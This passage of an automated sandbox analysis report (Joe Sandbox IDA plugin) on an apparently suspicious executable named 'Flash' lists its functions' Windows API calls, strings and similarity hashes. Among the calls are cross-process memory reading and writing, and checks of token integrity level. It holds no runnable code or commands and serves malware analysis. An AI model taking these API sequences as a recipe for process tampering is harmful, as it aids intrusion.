                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 4b3f0b6fe5b2def4813ee5bf091a0993b9d9d53629aa2e99e898f9dd4d824f52
                                                        • Instruction ID: 879e7ae5872ec96f39acc02f908ba9b568105e52fb701bdbd85f7ed29638ad4c
                                                        • Opcode Fuzzy Hash: 4b3f0b6fe5b2def4813ee5bf091a0993b9d9d53629aa2e99e898f9dd4d824f52
                                                        • Instruction Fuzzy Hash: C8015731C01A1D9BCF00DFF9ED489EEBBB8BB09711F014556E501B2140DB709590DBA1
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A28CDE
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A28CE8
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A28CF7
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A28CFE
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A28D14
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: ca1e9b9ffe20a04dfe6d0c081865aab3a68ac2eb115a20578979b1c08730eb46
                                                        • Instruction ID: 88bf79acb910b8fbe8064ba81fafb642d1730e27e088e0e00da48c53a38fa53f
                                                        • Opcode Fuzzy Hash: ca1e9b9ffe20a04dfe6d0c081865aab3a68ac2eb115a20578979b1c08730eb46
                                                        • Instruction Fuzzy Hash: A7F0AF30201214AFEB114FE8AC88E673BBCEF4A754B104525F904C6190CAA19C86DB60
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A28D3F
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A28D49
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A28D58
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A28D5F
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A28D75
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: def76e911a92a7a694aed6944901e3ceebffe7322ff46d44bf509f34c011a0cc
                                                        • Instruction ID: e961885b15fbf9f81aeea7342059778404be198076b73e16d5d0ac7afa0d58b0
                                                        • Opcode Fuzzy Hash: def76e911a92a7a694aed6944901e3ceebffe7322ff46d44bf509f34c011a0cc
                                                        • Instruction Fuzzy Hash: CFF0C230211214AFEB114FA8EC88F673BBCEF4A754F040125F944C6190CBB1DD86DB60
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A2CD90
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A2CDA7
                                                        • MessageBeep.USER32(00000000), ref: 00A2CDBF
                                                        • KillTimer.USER32(?,0000040A), ref: 00A2CDDB
                                                        • EndDialog.USER32(?,00000001), ref: 00A2CDF5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: aac70863ba8ea70743378cfabc19745cf2d9b5c41b34eb9404c69b11b002d436
                                                        • Instruction ID: 2ab0bda1a4c4a7e5f119bbc96d9655833fd2f62d7f832c128e184a21524d7e69
                                                        • Opcode Fuzzy Hash: aac70863ba8ea70743378cfabc19745cf2d9b5c41b34eb9404c69b11b002d436
                                                        • Instruction Fuzzy Hash: 8E018674500714ABEB219B68ED4EFAB7B78FB00715F000679F593A10E1DBF0A9958B90
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 009D179B
                                                        • StrokeAndFillPath.GDI32(?,?,00A0BBC9,00000000,?), ref: 009D17B7
                                                        • SelectObject.GDI32(?,00000000), ref: 009D17CA
                                                        • DeleteObject.GDI32 ref: 009D17DD
                                                        • StrokePath.GDI32(?), ref: 009D17F8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: c2ab44d84af3a2c543fe64735a81c7db81c5f091596d192b586db48bc790f85c
                                                        • Instruction ID: 85d1aab4c5a954b03bd576bcd06fcdab4cf71c7ab72ed428fee449d124e0c8ac
                                                        • Opcode Fuzzy Hash: c2ab44d84af3a2c543fe64735a81c7db81c5f091596d192b586db48bc790f85c
                                                        • Instruction Fuzzy Hash: 18F0B231158208BBDB119FA6ED4CF5A3BB8AB01326F15C216F829552F0CBB589D7DF20
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00A3CA75
                                                        • CoCreateInstance.OLE32(00A63D3C,00000000,00000001,00A63BAC,?), ref: 00A3CA8D
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                        • CoUninitialize.OLE32 ref: 00A3CCFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: bf5890bbd8b974e1f68e6550cf45751585abb4f3ea1de88f5a0debc77c09e8f1
                                                        • Instruction ID: 80b67d51c6f00310c26cef980f97d0e8c1c3f4ec0ae79aa7b96e777b876aaa48
                                                        • Opcode Fuzzy Hash: bf5890bbd8b974e1f68e6550cf45751585abb4f3ea1de88f5a0debc77c09e8f1
                                                        • Instruction Fuzzy Hash: F0A11971544205AFD300EF64C881EAFB7E9EF98714F00892DF155972A2EB70AE49CB92
                                                        APIs
                                                          • Part of subcall function 009F0FE6: std::exception::exception.LIBCMT ref: 009F101C
                                                          • Part of subcall function 009F0FE6: __CxxThrowException@8.LIBCMT ref: 009F1031
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 009E1680: _memmove.LIBCMT ref: 009E16DB
                                                        • __swprintf.LIBCMT ref: 009DE598
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 009DE431
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: 5175c3e217330aa9aa527fa36d17a695f233a6dcb03b11879ccb39ac0752dc17
                                                        • Instruction ID: 424378a1db3171664ae8be7f3b09bda337de37687c85d96ffdf209694b5e99eb
                                                        • Opcode Fuzzy Hash: 5175c3e217330aa9aa527fa36d17a695f233a6dcb03b11879ccb39ac0752dc17
                                                        • Instruction Fuzzy Hash: F191AC71508241DFCB15FF24C895E6EB7A8AFD5300F44491EF5969B2A2EB30ED44CB92
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 009F52CD
                                                          • Part of subcall function 00A00320: __87except.LIBCMT ref: 00A0035B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: fa5535a86948f0bad68498919650583a89724e1594f5640c011f66da223a6e7c
                                                        • Instruction ID: 5b73ef191ddcce7f0882d903b13530e6fbff21cee05fb22a4cb11470d291bccd
                                                        • Opcode Fuzzy Hash: fa5535a86948f0bad68498919650583a89724e1594f5640c011f66da223a6e7c
                                                        • Instruction Fuzzy Hash: 3251A131E09A0DD7CB11B718E941BBA2BA8DB00750F314E18E7D1861E9EFB98CC59B46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #$+
                                                        • API String ID: 0-2552117581
                                                        • Opcode ID: 650d907ac18d9e78b34cce4998d8125f384d3e0d420cfbeb365b9f3b08ba04ad
                                                        • Instruction ID: f5a9306f015355992be7f6a12f0bf72da1ae3bb207bf02c14e029a36b82f0da8
                                                        • Opcode Fuzzy Hash: 650d907ac18d9e78b34cce4998d8125f384d3e0d420cfbeb365b9f3b08ba04ad
                                                        • Instruction Fuzzy Hash: 565125755012A9CFDF15EF6CD840AFA7BA8EF99310F2440A5FD919B291D734AC82CB60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: ERCP
                                                        • API String ID: 2532777613-1384759551
                                                        • Opcode ID: e4261930e8c4e80c078c6110debaab30b51d36ac32a5301f1670e59653c753cb
                                                        • Instruction ID: acc164f3a2255c600a1aa208f32272733b68f9118c7ddcf1093ca146bf91bc0f
                                                        • Opcode Fuzzy Hash: e4261930e8c4e80c078c6110debaab30b51d36ac32a5301f1670e59653c753cb
                                                        • Instruction Fuzzy Hash: A651D3B19003499FDB25DF65C8817AABBF9EF44311F24857EE54ADB241E730DA82CB50
                                                        APIs
                                                          • Part of subcall function 00A31CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A29E4E,?,?,00000034,00000800,?,00000034), ref: 00A31CE5
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A2A3F7
                                                          • Part of subcall function 00A31C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A29E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00A31CB0
                                                          • Part of subcall function 00A31BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00A31C08
                                                          • Part of subcall function 00A31BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A29E12,00000034,?,?,00001004,00000000,00000000), ref: 00A31C18
                                                          • Part of subcall function 00A31BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A29E12,00000034,?,?,00001004,00000000,00000000), ref: 00A31C2E
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A2A464
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A2A4B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: d20135c5b396ce97b569a9f951a08f03fcd426794941cbbd73153a1c0a68c4d8
                                                        • Instruction ID: d119ff071c7f8c07ad351be7c710ca11082e376e9ddb33aad8a392ac637f2775
                                                        • Opcode Fuzzy Hash: d20135c5b396ce97b569a9f951a08f03fcd426794941cbbd73153a1c0a68c4d8
                                                        • Instruction Fuzzy Hash: 5C413D7690021CBFDB10DFA4CD85ADEBBB8EF45300F004095FA55B7190DAB1AE85CBA1
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A57A86
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A57A9A
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A57ABE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: 37c6e7b95fa3c9b1017d6bf4e0502a52f4d7f4fed9ab167f6b37156dd4460553
                                                        • Instruction ID: dae10a360d5422826ba49364d5a72f9684dd4757c6a51c1199e93cd3c56456dd
                                                        • Opcode Fuzzy Hash: 37c6e7b95fa3c9b1017d6bf4e0502a52f4d7f4fed9ab167f6b37156dd4460553
                                                        • Instruction Fuzzy Hash: 7E218D32654218ABDF21CF94DC46FEE3B69FB48764F110214FE157B190DAB1A8558BA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A5826F
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A5827D
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A58284
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: e14a0b631ced87c9af64b39ee35a0040e4fcefd8fa8946b244e337f876033726
                                                        • Instruction ID: f1e0fe2dd93c993081ac4bf3913b66039cc0837ee8a1fd062dd796ffe3eee75e
                                                        • Opcode Fuzzy Hash: e14a0b631ced87c9af64b39ee35a0040e4fcefd8fa8946b244e337f876033726
                                                        • Instruction Fuzzy Hash: 93219CB5604208AFDB00DF58CC85DAB37EDFB593A4B044059FA11AB2A1CB70EC51CBB0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A57360
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A57370
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A57395
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 52ec3c3e22e49995e2c54bad99d3c682fc42ab9095493c5d408efc197bec3329
                                                        • Instruction ID: 8ba8457fdc200d50c060e501a9b354c2e860829ff04279d190cfd324bdee091f
                                                        • Opcode Fuzzy Hash: 52ec3c3e22e49995e2c54bad99d3c682fc42ab9095493c5d408efc197bec3329
                                                        • Instruction Fuzzy Hash: 9521B032614118BFDF128F54DC85EBF37AAFB89771F018124FD00AB190D671AC559BA0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00A1027A,?), ref: 00A4C6E7
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A4C6F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                        • API String ID: 2574300362-1816364905
                                                        • Opcode ID: 42822b2de58ea5221fb3b7474479c58b480bb28cadcdf541079ccbdca2ae94c7
                                                        • Instruction ID: 89a328798ae8da018a08c414af96e5b616b72c34ed776e01dd0888a07b459850
                                                        • Opcode Fuzzy Hash: 42822b2de58ea5221fb3b7474479c58b480bb28cadcdf541079ccbdca2ae94c7
                                                        • Instruction Fuzzy Hash: D4E0C23D511303AFD7209B6ACC48E5376E4FF04324B408829E989C2250D7B0CC808F20
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,009E4AF7,?), ref: 009E4BB8
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009E4BCA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: 54a93d9e716d4b1abb3f11f87f36457f1747fad6cc6b2c38dfeb32b6c446b7b5
                                                        • Instruction ID: 43498bc3ba3d9e9096dcf707203621501d45361b42dbe72a4dacb4713ec0f547
                                                        • Opcode Fuzzy Hash: 54a93d9e716d4b1abb3f11f87f36457f1747fad6cc6b2c38dfeb32b6c446b7b5
                                                        • Instruction Fuzzy Hash: 18D017715107129FE7219F72DC08B0B76E9AF05351B199C6AD496D2554EAB0D8C0CA10
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,009E4B44,?,009E49D4,?,?,009E27AF,?,00000001), ref: 009E4B85
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009E4B97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 5fc6ac00dc7188ba964b2a1dc300bacc16e7008e24b4dec2176112d85223c50c
                                                        • Instruction ID: dd968f670712782fe6e390e90f21657246d792df8a4d7880ccacd0cebc0f3985
